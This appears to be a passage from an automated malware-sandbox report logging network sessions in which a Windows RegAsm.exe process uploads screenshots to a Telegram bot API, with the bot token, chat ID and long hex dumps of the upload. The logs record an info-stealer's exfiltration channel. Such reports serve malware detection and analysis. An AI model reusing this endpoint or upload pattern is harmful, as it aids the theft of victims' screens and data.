                                                                            2025-01-09 10:39:08 UTC16355OUTData Raw: c1 73 69 c5 79 cf a4 a9 73 7e 9d 26 6d 1d ef 71 f2 0c fb fd 2d cf 02 8c 88 84 5f 8d 17 7d be f5 f1 90 93 1f 8f e3 15 91 f4 eb 9c ec c6 91 d4 1b 85 4a e8 8d ca 52 0b 40 9f 0f 91 f4 f3 cc 48 3d 09 bf 1a 9f 33 c3 b2 00 6c c6 2f 77 01 38 4b e8 05 48 fe 79 01 d8 ae 2f 02 70 ea 2f 7f 9a a1 2f f9 d7 e1 e8 ed 22 0b 40 e6 fd 31 60 e5 ce 30 73 13 30 c7 80 fd c5 1f c3 08 40 44 5e 8d c4 a0 97 81 c4 e6 12 80 3a 02 ac 7e 67 81 cf 00 d4 25 20 54 fe 79 24 02 a1 bb f6 96 a6 d2 ef 70 1b 5b cb b8 f3 d6 9b db f8 6a 7b 6f 5e 02 d6 20 f8 a8 f4 5b 65 fb 82 af fa e3 38 30 f2 8f be 17 80 33 cf ff bb 2d 75 0e ba 21 4b 3d 24 1f af 33 7d 38 7b 35 af 27 31 a8 be 2a ff 5a 69 f8 d6 1f 36 97 79 1c 72 73 7b 09 08 62 8f 18 15 7e 12 82 5e f8 81 f2 57 73 4b 32 b7 04 bb a3 be 3a da 4b df 0b
                                                                            Data Ascii: siys~&mq-_}JR@H=3l/w8KHy/p//"@1`0s0@D^:~g% Ty$p[j{o^ [e803-u!K=$3}8{5'1*Zi6yrs{b~^WsK2:K
                                                                            2025-01-09 10:39:09 UTC389INHTTP/1.1 200 OK
                                                                            Server: nginx/1.18.0
                                                                            Date: Thu, 09 Jan 2025 10:39:09 GMT
                                                                            Content-Type: application/json
                                                                            Content-Length: 1832
                                                                            Connection: close
                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            29192.168.2.449896149.154.167.2204437588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-09 10:39:10 UTC2113OUTPOST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D [TRUNCATED]
                                                                            Content-Type: multipart/form-data; boundary================8dd36a9863e4759
                                                                            Host: api.telegram.org
                                                                            Content-Length: 695479
                                                                            Connection: Keep-Alive
                                                                            2025-01-09 10:39:10 UTC16355OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 36 61 39 38 36 33 65 34 37 35 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 44 6f 63 75 6d 65 6e 74 73 5c 4e 4f 56 41 5c 43 61 70 74 75 72 65 64 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48
                                                                            Data Ascii: --===============8dd36a9863e4759Content-Disposition: form-data; name="document"; filename="C:\Users\user\Documents\NOVA\Captured.png"Content-Type: application/x-ms-dos-executablePNGIHDRCsRGBgAMAapH
                                                                            2025-01-09 10:39:10 UTC16355OUTData Raw: a1 27 79 27 69 07 3e 2f 51 47 cb 58 7b 48 e6 69 ad 62 92 7a be 17 63 bd 04 84 35 8a 4b f2 a9 d2 8f b5 ec cf bc e6 88 d1 4a e0 81 2a f3 24 e7 d4 12 a3 45 00 e6 aa bd 66 ec 79 c4 91 87 c8 3f 5a e5 31 07 f4 89 21 06 4b 01 28 d9 27 a9 e7 b2 4f f3 82 18 79 e4 33 9e a8 00 fc fc 95 81 dc 1b 85 6b 1f aa 4e b9 ee 91 ea 94 1b 1f 4b 3c 5e 9d 75 fb cf aa ab 1e f8 79 75 c7 4f 7f 5e 5d bd e6 91 a1 95 7e fd c8 f7 15 49 bb 49 62 9f 7f 36 d4 c2 af 10 80 54 ff 3d fe e5 ba ff f4 79 d5 b3 37 ee 3f a3 0a f0 b9 3b ea 2a c0 17 7e f4 fe ea 05 04 e0 4f 10 80 cd 31 e0 56 00 7e ba fa ed 03 07 86 22 6f b6 44 12 6f be 91 78 8b a4 dc 28 e8 05 1e c0 51 de 28 67 14 b4 47 24 f2 66 cb 7c 09 c0 53 4f 3d b5 7a f9 b7 bf b5 4a bf 5a 00 4e 8f e3 a3 bf e3 56 ff 65 01 d8 c8 bf 56 00 1e 7d f4 82
                                                                            Data Ascii: 'y'i>/QGX{Hibzc5KJ*$Efy?Z1!K('Oy3kNK<^uyuO^]~IIb6T=y7?;*~O1V~"oDox(Q(gG$f|SO=zJZNVeV}
                                                                            2025-01-09 10:39:10 UTC16355OUTData Raw: 78 25 0a c0 48 f2 0d 23 92 7e 4e 29 f4 4a d6 a6 00 8c 04 df 30 16 04 e0 3d 3d 22 af 5f 7c 18 91 fc 83 48 f4 f5 63 41 00 a6 39 93 7a d0 2f ee 55 80 03 41 e2 35 02 b0 94 80 12 80 5e 01 e8 f2 cf 05 a0 84 5e 84 e6 25 f3 3c 5f fb 97 b9 82 2a 40 d6 b8 f4 73 96 bd f5 b6 16 97 80 92 76 e3 20 a9 07 f4 15 73 ca 5c 97 7d 3a 0a 4c 1f c9 27 e1 a7 79 c5 24 09 c9 95 00 d4 33 04 fd 99 82 c0 b1 5f 97 7e 0e 02 90 4a be 52 f4 d1 d7 18 31 a8 6a 40 e1 63 97 7d 25 92 7c 7a 63 30 f2 af 14 80 3a f2 eb 95 7d 8c 25 fb 68 91 7f 5e 15 28 f2 78 d7 b4 be 11 80 aa ea f3 e3 be 88 3f c6 12 82 ca d7 11 60 64 1c 22 6e f9 6e 37 66 74 b4 57 62 0f e1 27 99 47 1f 5c e2 b5 22 af 41 73 9a 57 f5 9f 62 e5 3a de 06 8c d4 e3 b8 af c4 9f 44 9f f7 25 fd 24 0c 25 0d 91 79 12 80 aa 00 44 f6 d1 42 3e e6
                                                                            Data Ascii: x%H#~N)J0=="_|HcA9z/UA5^^%<_*@sv s\}:L'y$3_~JR1j@c}%|zc0:}%h^(x?`d"nn7ftWb'G\"AsWb:D%$%yDB>
                                                                            2025-01-09 10:39:10 UTC16355OUTData Raw: 98 05 df cd 3d 2c 7e db 2d 19 fa d1 11 62 c9 c2 fc 8c 40 84 1d f2 ae 91 83 5e 29 48 5c b1 7e 48 fc 49 20 4a 10 22 0c 55 35 58 a2 79 1d 25 56 8c b6 dd 67 1f 24 5f ef 0b 43 bc 7a 50 e3 c5 6f 4a 6b 8c a9 3d d2 75 77 bb ae 5a b4 e7 8d d5 b2 7d d2 f7 93 62 f4 89 77 77 bf 3e cf d1 12 63 ce 2b 00 4b 24 fe 5c 02 92 af 35 08 40 55 f5 e5 6a 3e a3 8d b7 15 7e 88 bd ab ab a5 bb 5d 53 2d db 1d c1 87 b8 63 ee aa 1c a3 df dd f1 f2 6a 6a a7 2b f2 78 79 ba 5f 44 df 8a 74 9f 2b d3 7d d2 b2 8f 8e 02 d3 97 0c 24 77 5a 08 5e 9d 8f 06 d3 ba 5c ec c7 14 e2 0d 71 b7 1b 82 30 ad df f1 aa aa bb fd 15 19 fa cc c1 62 44 5d 82 18 68 cc fa ce 76 97 67 e8 03 6b 69 99 67 ad f2 e9 97 d7 d0 fe 2e 02 25 0a 15 cb 42 b0 11 73 a5 b4 a3 a2 8f 96 39 84 9f aa 02 89 d1 92 ef 52 4f 28 be 84 17 66
                                                                            Data Ascii: =,~-b@^)H\~HI J"U5Xy%Vg$_CzPoJk=uwZ}bww>c+K$\5@Uj>~]S-cjj+xy_Dt+}$wZ^\q0bD]hvgkig.%Bs9RO(f
                                                                            2025-01-09 10:39:10 UTC16355OUTData Raw: 5e 22 22 59 75 20 c7 85 93 f7 06 2e 5d 50 7e 4f 03 cb 17 96 fc 4c e2 05 32 49 28 59 fe 46 85 df f2 b9 3d d9 dc 56 d8 15 80 8b 71 58 0b c0 0d 90 89 be 59 ac 91 77 db 20 00 33 69 b7 9d ec 0a c0 f9 2c 22 00 21 95 80 73 c8 44 de 56 58 54 00 ae bc b9 fc 5c 49 5c 32 e9 17 99 27 fb 0e e7 77 00 4a 26 fb 32 90 79 9b 21 13 80 92 09 bf 96 28 f4 66 11 c5 5e 1b 6f c7 91 45 05 20 1c 69 02 30 ca bf 28 00 ad f8 8b f2 0f 10 80 92 09 bf 96 ad 0a c0 38 1f 69 c5 9f 6c b7 00 cc 2a 01 21 ca 3f d8 ac 00 04 8f fd d2 b7 1a 90 3e 02 d0 38 64 02 50 99 d7 56 f7 71 1c 18 1c 93 67 2c ae 69 05 a0 ef fd 73 8c 00 cc 24 a0 15 82 51 d6 29 f5 94 75 1c 0b b6 ca 8f 77 04 32 66 6e cd f1 dd 81 b8 97 c4 aa bf b8 7f db f7 f8 2f 17 84 78 49 08 e2 cf cb 43 14 76 4a bb 28 f6 94 7a c6 a2 c4 b3 55 00
                                                                            Data Ascii: ^""Yu .]P~OL2I(YF=VqXYw 3i,"!sDVXT\I\2'wJ&2y!(f^oE i0(8il*!?>8dPVqg,is$Q)uw2fn/xICvJ(zU
                                                                            2025-01-09 10:39:10 UTC16355OUTData Raw: 23 ca 3d 85 a0 20 06 5b 62 f5 df 4c c9 37 03 aa 01 ad de 9b 05 02 10 b9 17 2b ff 3c f2 ab f0 53 fe 99 c3 18 c1 e7 7b fe 5a e9 27 7d ce 34 99 00 8c 7d a0 cf 45 21 b4 be 03 30 4a 3c a5 9e 55 7d fd dc 0d 53 12 d0 4a 40 2b fd 5c d3 ae 47 00 46 09 d8 0a c0 a3 ca 67 f3 5d 80 08 40 df fd 67 45 20 e2 ae 3d fa ab f4 63 4e f9 27 cc c7 1b 7f c9 a5 8d 02 90 be 63 c5 5f 94 76 ed 98 16 59 67 6c 94 77 61 ae 15 7d ae e5 36 e0 a5 67 5e 33 25 0d 9d ab eb 87 4a bf 58 05 28 88 40 2a fd bc e1 97 16 01 48 8b e8 8b 47 7f 7b e9 17 fb bd cc a3 6d 05 20 37 fd d6 0b 40 9e d1 cf 1b 43 fa 59 01 48 0c 01 38 39 e6 e3 55 e0 29 f9 7c ff 1f 12 af 8a b7 41 0e 66 72 0f da 77 08 d2 af 47 76 4b 1c 90 76 1e d5 45 fa 29 03 39 16 1c 45 1e 31 40 f4 29 fb c8 f7 79 0a c2 28 0d 11 84 c6 5a f1 a6 98
                                                                            Data Ascii: #= [bL7+<S{Z'}4}E!0J<U}SJ@+\GFg]@gE =cN'c_vYglwa}6g^3%JX(@*HG{m 7@CYH89U)|AfrwGvKvE)9E1@)y(Z
                                                                            2025-01-09 10:39:10 UTC16355OUTData Raw: fd 90 7c ca 3f a9 e2 6f 90 81 1c ff ed 05 60 26 f8 d6 63 9b 04 60 5b fd 47 b5 1f c7 81 11 7e d9 2f 24 20 f3 1c 11 a6 1f d7 6e e4 d2 90 c3 52 00 de 80 00 3c 7b a8 fe 43 fe 4d 57 ff 75 df 7f 6f 2f 00 ef be bb 5e 00 f2 c0 0b 4e e9 1e 7c ca ff d6 dd 7f ee 7b bb 7b 6f bb 6d a6 00 bc ec d3 7f dd 5d fe c5 8f 75 1f fe f6 8d 8f 1b 01 78 d6 d9 67 77 07 1f 7e 78 94 57 b4 c8 27 fa b7 de 75 7f f7 0f 87 77 d2 cd e3 d8 0b bf 5b d7 51 d1 16 e3 7f 12 2e b2 60 6c ff be fb ee ef 1e 3a 78 b0 7b d3 5b de 72 44 09 c0 f6 bb f2 e7 ec 2b 00 57 e5 1f d5 81 51 86 ce 15 80 7e 27 03 6b 04 60 fc ae 12 59 b7 13 ac 11 80 b2 46 00 ce a0 0a c0 f2 cf a2 58 11 58 40 ee 55 c1 77 31 ef 05 e4 fd 80 0f 77 7b 2f ed 46 f6 5d fe e8 50 19 d8 5f 32 c2 bb 03 eb 91 61 64 a0 22 b0 40 25 60 ad 08 7c df
                                                                            Data Ascii: |?o`&c`[G~/$ nR<{CMWuo/^N|{{om]uxgw~xW'uw[Q.`l:x{[rD+WQ~'k`YFXX@Uw1w{/F]P_2ad"@%`|
                                                                            2025-01-09 10:39:10 UTC16355OUTData Raw: 88 43 8e 00 23 e8 54 f1 37 23 fc 6c 6d 91 81 cd 5c 23 f5 24 f6 bc f8 03 3f ef 41 16 72 c4 58 fb d1 e6 a3 bf b6 ef 9a 7d 6e 4a ab f7 b4 9f e1 ae f6 9e 76 9e 2d ff bc 00 ac c5 1c c2 0e f1 c7 85 20 db d8 1e b9 4a 6f 80 e4 f3 f3 40 5f 63 f6 a2 af 1c 9f a7 5c 5f cd 07 be ca 4f 73 12 7f 1e 49 40 5d f6 21 e1 a7 ea 3f 2e 07 21 46 a5 9e 44 1f ad 9e e5 27 b1 e7 25 a0 60 2c 18 7b 31 e8 05 21 7d 5d f4 e1 a5 9f aa fc 40 73 aa f8 93 00 cc f2 cf be 97 5c 85 47 ac 48 3a a1 aa 3d fa cc 73 74 57 a2 50 22 10 94 43 3f 12 83 9d bf b8 a2 ad 32 f4 fb e5 b9 d7 fd 7d 2b ed 24 e4 24 ed 90 7c 5e fe d5 72 90 3e 22 4f 63 f2 54 ed e7 f7 93 08 d4 1e 12 80 40 9f 39 ed c5 c5 21 9d d7 5d d1 e6 30 f6 b9 ba 58 c4 c7 e6 f5 0c c0 cb bf 7e 79 16 80 f0 dc 73 cf a5 ef df 72 4f 3a ee ec bf cb 17
                                                                            Data Ascii: C#T7#lm\#$?ArX}nJv- Jo@_c\_OsI@]!?.!FD'%`,{1!}]@s\GH:=stWP"C?2}+$$|^r>"OcT@9!]0X~ysrO:
                                                                            2025-01-09 10:39:10 UTC16355OUTData Raw: 44 91 80 54 02 22 f5 10 7c 92 7c c4 84 a4 1f cf 0d 24 bf ac c9 a2 6e d7 e3 66 60 2c de 7e 5e ea 92 53 9e f9 97 fb c4 ca 9a 1e e1 a7 5c da 1a cb f7 d2 2b 4b 30 84 18 02 0d 29 46 9f 18 48 a0 d5 b2 ac 46 b9 c3 08 40 72 b4 9f d6 f1 da 5e 40 12 a7 2f a2 98 c6 ac e3 d9 83 d1 be c4 fa c5 59 a3 d7 2c 73 ad 00 44 06 d6 b2 0f 98 e3 62 0f 04 1c 20 f0 10 6f 3e e7 dd 5f 74 42 ce 88 e4 1f 30 37 5f 01 68 6b a8 02 d4 6b d0 cf 20 f9 90 80 c8 3f eb 67 f1 17 09 40 20 0f 81 27 24 e2 f6 b6 fe 51 f6 19 11 77 3c db 8f 96 71 8d c4 9f 28 7b 64 18 53 fd a7 e7 03 d2 27 a6 f9 8a 65 01 58 08 a4 de 28 44 d2 cf 13 4b 3f 8f 7d 87 83 08 a5 dd 0c 2f 67 01 38 b1 fe 97 69 f2 dc 5f b7 78 19 d8 23 02 c5 f9 f6 ff 15 a5 42 b0 ad 14 ac aa 02 3b 3c 3b b0 88 c0 88 a9 4d 36 b7 f1 b9 e6 06 e2 0b 9e
                                                                            Data Ascii: DT"||$nf`,~^S\+K0)FHF@r^@/Y,sDb o>_tB07_hkk ?g@ '$Qw<q({dS'eX(DK?}/g8i_x#B;<;M6
                                                                            2025-01-09 10:39:10 UTC16355OUTData Raw: c1 73 69 c5 79 cf a4 a9 73 7e 9d 26 6d 1d ef 71 f2 0c fb fd 2d cf 02 8c 88 84 5f 8d 17 7d be f5 f1 90 93 1f 8f e3 15 91 f4 eb 9c ec c6 91 d4 1b 85 4a e8 8d ca 52 0b 40 9f 0f 91 f4 f3 cc 48 3d 09 bf 1a 9f 33 c3 b2 00 6c c6 2f 77 01 38 4b e8 05 48 fe 79 01 d8 ae 2f 02 70 ea 2f 7f 9a a1 2f f9 d7 e1 e8 ed 22 0b 40 e6 fd 31 60 e5 ce 30 73 13 30 c7 80 fd c5 1f c3 08 40 44 5e 8d c4 a0 97 81 c4 e6 12 80 3a 02 ac 7e 67 81 cf 00 d4 25 20 54 fe 79 24 02 a1 bb f6 96 a6 d2 ef 70 1b 5b cb b8 f3 d6 9b db f8 6a 7b 6f 5e 02 d6 20 f8 a8 f4 5b 65 fb 82 af fa e3 38 30 f2 8f be 17 80 33 cf ff bb 2d 75 0e ba 21 4b 3d 24 1f af 33 7d 38 7b 35 af 27 31 a8 be 2a ff 5a 69 f8 d6 1f 36 97 79 1c 72 73 7b 09 08 62 8f 18 15 7e 12 82 5e f8 81 f2 57 73 4b 32 b7 04 bb a3 be 3a da 4b df 0b
                                                                            Data Ascii: siys~&mq-_}JR@H=3l/w8KHy/p//"@1`0s0@D^:~g% Ty$p[j{o^ [e803-u!K=$3}8{5'1*Zi6yrs{b~^WsK2:K
                                                                            2025-01-09 10:39:12 UTC389INHTTP/1.1 200 OK
                                                                            Server: nginx/1.18.0
                                                                            Date: Thu, 09 Jan 2025 10:39:11 GMT
                                                                            Content-Type: application/json
                                                                            Content-Length: 1828
                                                                            Connection: close
                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            30192.168.2.449918149.154.167.2204437588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-09 10:39:14 UTC2113OUTPOST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D [TRUNCATED]
                                                                            Content-Type: multipart/form-data; boundary================8dd38dbda814e8d
                                                                            Host: api.telegram.org
                                                                            Content-Length: 695479
                                                                            Connection: Keep-Alive
                                                                            2025-01-09 10:39:14 UTC16355OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 38 64 62 64 61 38 31 34 65 38 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 44 6f 63 75 6d 65 6e 74 73 5c 4e 4f 56 41 5c 43 61 70 74 75 72 65 64 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48
                                                                            Data Ascii: --===============8dd38dbda814e8dContent-Disposition: form-data; name="document"; filename="C:\Users\user\Documents\NOVA\Captured.png"Content-Type: application/x-ms-dos-executablePNGIHDRCsRGBgAMAapH
                                                                            2025-01-09 10:39:14 UTC16355OUTData Raw: a1 27 79 27 69 07 3e 2f 51 47 cb 58 7b 48 e6 69 ad 62 92 7a be 17 63 bd 04 84 35 8a 4b f2 a9 d2 8f b5 ec cf bc e6 88 d1 4a e0 81 2a f3 24 e7 d4 12 a3 45 00 e6 aa bd 66 ec 79 c4 91 87 c8 3f 5a e5 31 07 f4 89 21 06 4b 01 28 d9 27 a9 e7 b2 4f f3 82 18 79 e4 33 9e a8 00 fc fc 95 81 dc 1b 85 6b 1f aa 4e b9 ee 91 ea 94 1b 1f 4b 3c 5e 9d 75 fb cf aa ab 1e f8 79 75 c7 4f 7f 5e 5d bd e6 91 a1 95 7e fd c8 f7 15 49 bb 49 62 9f 7f 36 d4 c2 af 10 80 54 ff 3d fe e5 ba ff f4 79 d5 b3 37 ee 3f a3 0a f0 b9 3b ea 2a c0 17 7e f4 fe ea 05 04 e0 4f 10 80 cd 31 e0 56 00 7e ba fa ed 03 07 86 22 6f b6 44 12 6f be 91 78 8b a4 dc 28 e8 05 1e c0 51 de 28 67 14 b4 47 24 f2 66 cb 7c 09 c0 53 4f 3d b5 7a f9 b7 bf b5 4a bf 5a 00 4e 8f e3 a3 bf e3 56 ff 65 01 d8 c8 bf 56 00 1e 7d f4 82
                                                                            Data Ascii: 'y'i>/QGX{Hibzc5KJ*$Efy?Z1!K('Oy3kNK<^uyuO^]~IIb6T=y7?;*~O1V~"oDox(Q(gG$f|SO=zJZNVeV}
                                                                            2025-01-09 10:39:14 UTC16355OUTData Raw: 78 25 0a c0 48 f2 0d 23 92 7e 4e 29 f4 4a d6 a6 00 8c 04 df 30 16 04 e0 3d 3d 22 af 5f 7c 18 91 fc 83 48 f4 f5 63 41 00 a6 39 93 7a d0 2f ee 55 80 03 41 e2 35 02 b0 94 80 12 80 5e 01 e8 f2 cf 05 a0 84 5e 84 e6 25 f3 3c 5f fb 97 b9 82 2a 40 d6 b8 f4 73 96 bd f5 b6 16 97 80 92 76 e3 20 a9 07 f4 15 73 ca 5c 97 7d 3a 0a 4c 1f c9 27 e1 a7 79 c5 24 09 c9 95 00 d4 33 04 fd 99 82 c0 b1 5f 97 7e 0e 02 90 4a be 52 f4 d1 d7 18 31 a8 6a 40 e1 63 97 7d 25 92 7c 7a 63 30 f2 af 14 80 3a f2 eb 95 7d 8c 25 fb 68 91 7f 5e 15 28 f2 78 d7 b4 be 11 80 aa ea f3 e3 be 88 3f c6 12 82 ca d7 11 60 64 1c 22 6e f9 6e 37 66 74 b4 57 62 0f e1 27 99 47 1f 5c e2 b5 22 af 41 73 9a 57 f5 9f 62 e5 3a de 06 8c d4 e3 b8 af c4 9f 44 9f f7 25 fd 24 0c 25 0d 91 79 12 80 aa 00 44 f6 d1 42 3e e6
                                                                            Data Ascii: x%H#~N)J0=="_|HcA9z/UA5^^%<_*@sv s\}:L'y$3_~JR1j@c}%|zc0:}%h^(x?`d"nn7ftWb'G\"AsWb:D%$%yDB>
                                                                            2025-01-09 10:39:14 UTC16355OUTData Raw: 98 05 df cd 3d 2c 7e db 2d 19 fa d1 11 62 c9 c2 fc 8c 40 84 1d f2 ae 91 83 5e 29 48 5c b1 7e 48 fc 49 20 4a 10 22 0c 55 35 58 a2 79 1d 25 56 8c b6 dd 67 1f 24 5f ef 0b 43 bc 7a 50 e3 c5 6f 4a 6b 8c a9 3d d2 75 77 bb ae 5a b4 e7 8d d5 b2 7d d2 f7 93 62 f4 89 77 77 bf 3e cf d1 12 63 ce 2b 00 4b 24 fe 5c 02 92 af 35 08 40 55 f5 e5 6a 3e a3 8d b7 15 7e 88 bd ab ab a5 bb 5d 53 2d db 1d c1 87 b8 63 ee aa 1c a3 df dd f1 f2 6a 6a a7 2b f2 78 79 ba 5f 44 df 8a 74 9f 2b d3 7d d2 b2 8f 8e 02 d3 97 0c 24 77 5a 08 5e 9d 8f 06 d3 ba 5c ec c7 14 e2 0d 71 b7 1b 82 30 ad df f1 aa aa bb fd 15 19 fa cc c1 62 44 5d 82 18 68 cc fa ce 76 97 67 e8 03 6b 69 99 67 ad f2 e9 97 d7 d0 fe 2e 02 25 0a 15 cb 42 b0 11 73 a5 b4 a3 a2 8f 96 39 84 9f aa 02 89 d1 92 ef 52 4f 28 be 84 17 66
                                                                            Data Ascii: =,~-b@^)H\~HI J"U5Xy%Vg$_CzPoJk=uwZ}bww>c+K$\5@Uj>~]S-cjj+xy_Dt+}$wZ^\q0bD]hvgkig.%Bs9RO(f
                                                                            2025-01-09 10:39:14 UTC16355OUTData Raw: 5e 22 22 59 75 20 c7 85 93 f7 06 2e 5d 50 7e 4f 03 cb 17 96 fc 4c e2 05 32 49 28 59 fe 46 85 df f2 b9 3d d9 dc 56 d8 15 80 8b 71 58 0b c0 0d 90 89 be 59 ac 91 77 db 20 00 33 69 b7 9d ec 0a c0 f9 2c 22 00 21 95 80 73 c8 44 de 56 58 54 00 ae bc b9 fc 5c 49 5c 32 e9 17 99 27 fb 0e e7 77 00 4a 26 fb 32 90 79 9b 21 13 80 92 09 bf 96 28 f4 66 11 c5 5e 1b 6f c7 91 45 05 20 1c 69 02 30 ca bf 28 00 ad f8 8b f2 0f 10 80 92 09 bf 96 ad 0a c0 38 1f 69 c5 9f 6c b7 00 cc 2a 01 21 ca 3f d8 ac 00 04 8f fd d2 b7 1a 90 3e 02 d0 38 64 02 50 99 d7 56 f7 71 1c 18 1c 93 67 2c ae 69 05 a0 ef fd 73 8c 00 cc 24 a0 15 82 51 d6 29 f5 94 75 1c 0b b6 ca 8f 77 04 32 66 6e cd f1 dd 81 b8 97 c4 aa bf b8 7f db f7 f8 2f 17 84 78 49 08 e2 cf cb 43 14 76 4a bb 28 f6 94 7a c6 a2 c4 b3 55 00
                                                                            Data Ascii: ^""Yu .]P~OL2I(YF=VqXYw 3i,"!sDVXT\I\2'wJ&2y!(f^oE i0(8il*!?>8dPVqg,is$Q)uw2fn/xICvJ(zU
                                                                            2025-01-09 10:39:14 UTC16355OUTData Raw: 23 ca 3d 85 a0 20 06 5b 62 f5 df 4c c9 37 03 aa 01 ad de 9b 05 02 10 b9 17 2b ff 3c f2 ab f0 53 fe 99 c3 18 c1 e7 7b fe 5a e9 27 7d ce 34 99 00 8c 7d a0 cf 45 21 b4 be 03 30 4a 3c a5 9e 55 7d fd dc 0d 53 12 d0 4a 40 2b fd 5c d3 ae 47 00 46 09 d8 0a c0 a3 ca 67 f3 5d 80 08 40 df fd 67 45 20 e2 ae 3d fa ab f4 63 4e f9 27 cc c7 1b 7f c9 a5 8d 02 90 be 63 c5 5f 94 76 ed 98 16 59 67 6c 94 77 61 ae 15 7d ae e5 36 e0 a5 67 5e 33 25 0d 9d ab eb 87 4a bf 58 05 28 88 40 2a fd bc e1 97 16 01 48 8b e8 8b 47 7f 7b e9 17 fb bd cc a3 6d 05 20 37 fd d6 0b 40 9e d1 cf 1b 43 fa 59 01 48 0c 01 38 39 e6 e3 55 e0 29 f9 7c ff 1f 12 af 8a b7 41 0e 66 72 0f da 77 08 d2 af 47 76 4b 1c 90 76 1e d5 45 fa 29 03 39 16 1c 45 1e 31 40 f4 29 fb c8 f7 79 0a c2 28 0d 11 84 c6 5a f1 a6 98
